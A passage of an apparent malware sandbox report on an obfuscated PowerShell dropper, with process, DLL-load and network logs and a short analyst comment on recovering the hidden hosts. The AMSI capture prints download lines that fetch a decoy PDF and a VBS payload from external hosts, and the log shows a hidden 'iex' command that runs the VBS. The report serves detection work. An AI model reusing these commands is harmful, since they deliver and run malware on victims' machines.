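                        (OBFUSCATED_VBS_URL, OBSERVED_VBS_URL)))
```

The token length is pinned by the length difference between the two forms (four extra characters over two occurrences means a three-character token), so the inference is unambiguous for this pair. When hunting, search the script for the token pattern or run the replacement first rather than grepping for the hostname; and although the report shows one of the HTTP requests answered with 404 during this run, both recovered hosts are still the ones to block and retro-hunt for.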
      Source: unknown; Network traffic detected: HTTP traffic on port 49712 -> 443
      Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49712
      Source: unknown; HTTPS traffic detected: 107.161.23.150:443 -> 192.168.2.7:49712 version: TLS 1.2
      Source: C:\Windows\System32\svchost.exe; File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
      Source: classification engine; Classification label: mal84.evad.winPS1@20/59@5/3
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File created: C:\Users\user\Desktop\List of Required items and services.pdf
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Mutant created: NULL
      Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7580:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qspzcx0m.yll.ps1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\f2iuzg.vbs'"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File read: C:\Users\desktop.ini
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
      Source: 2rTi9MgX25.ps1; ReversingLabs: Detection: 34%
      Source: 2rTi9MgX25.ps1; Virustotal: Detection: 41%
      Source: unknown; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\2rTi9MgX25.ps1"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\f2iuzg.vbs'"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe; Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
      Source: unknown; Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe; Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2092 --field-trial-handle=1636,i,14229449947931004828,5729457829333662264,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\f2iuzg.vbs'"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe; Process created: unknown unknown
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe; Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe; Process created: unknown unknown
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe; Process created: unknown unknown
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe; Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2092 --field-trial-handle=1636,i,14229449947931004828,5729457829333662264,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe; Process created: unknown unknown
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe; Process created: unknown unknown
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe; Process created: unknown unknown
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe; Process created: unknown unknown
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe; Process created: unknown unknown
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe; Process created: unknown unknown
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: linkinfo.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntshrui.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cscapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: policymanager.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msvcp110_win.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskflowdataengine.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cdp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: umpdc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dsreg.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dlnashext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wpdshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: es.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll
      Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll
      Source: Window Recorder Window detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbl source: powershell.exe, 00000001.00000002.1623669189.0000025F5BA9C000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1623669189.0000025F5BA9C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1404370506.000001E357BFD000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdb source: powershell.exe, 00000001.00000002.1623669189.0000025F5BACC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000001.00000002.1622343797.0000025F5B9FC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb$M| source: powershell.exe, 00000001.00000002.1622343797.0000025F5B9FC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: n.pdb) source: powershell.exe, 00000004.00000002.1402712060.000001E357A9B000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: n.pdb source: powershell.exe, 00000004.00000002.1402712060.000001E357A9B000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ows\dll\System.pdb source: powershell.exe, 00000001.00000002.1618094806.0000025F5B805000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000001.00000002.1623669189.0000025F5BA9C000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000001.00000002.1623669189.0000025F5BA79000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbFu source: powershell.exe, 00000001.00000002.1623669189.0000025F5BA64000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1403370389.000001E357B31000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb6vi source: powershell.exe, 00000001.00000002.1623669189.0000025F5BA64000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbeN source: powershell.exe, 00000004.00000002.1403370389.000001E357B31000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb7M source: powershell.exe, 00000001.00000002.1622343797.0000025F5B9FC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdb source: powershell.exe, 00000001.00000002.1623669189.0000025F5BA9C000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFAAB780953 push E95B7DD0h; ret 1_2_00007FFAAB7809C9
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFAAB850D6C push eax; ret 4_2_00007FFAAB850D6D

      Boot Survival

      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: .lnk -Name));getit -fz ($fzf + 'List of Required items and services.pdf') -oulv 'htctewww.astjlqntjlqrprisjlqs.com.pk/ms/List%20of%20rjlqquirjlqd%20itjlqms%20and%20sjlqrvicjlqs.pdf';getit -fz $flol -oulv 'http://www.blujlqmaxxlasjlqr.com/ms/ms.vbs';exit@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. 
Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help use

      Hooking and other Techniques for Hiding and Protection

      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
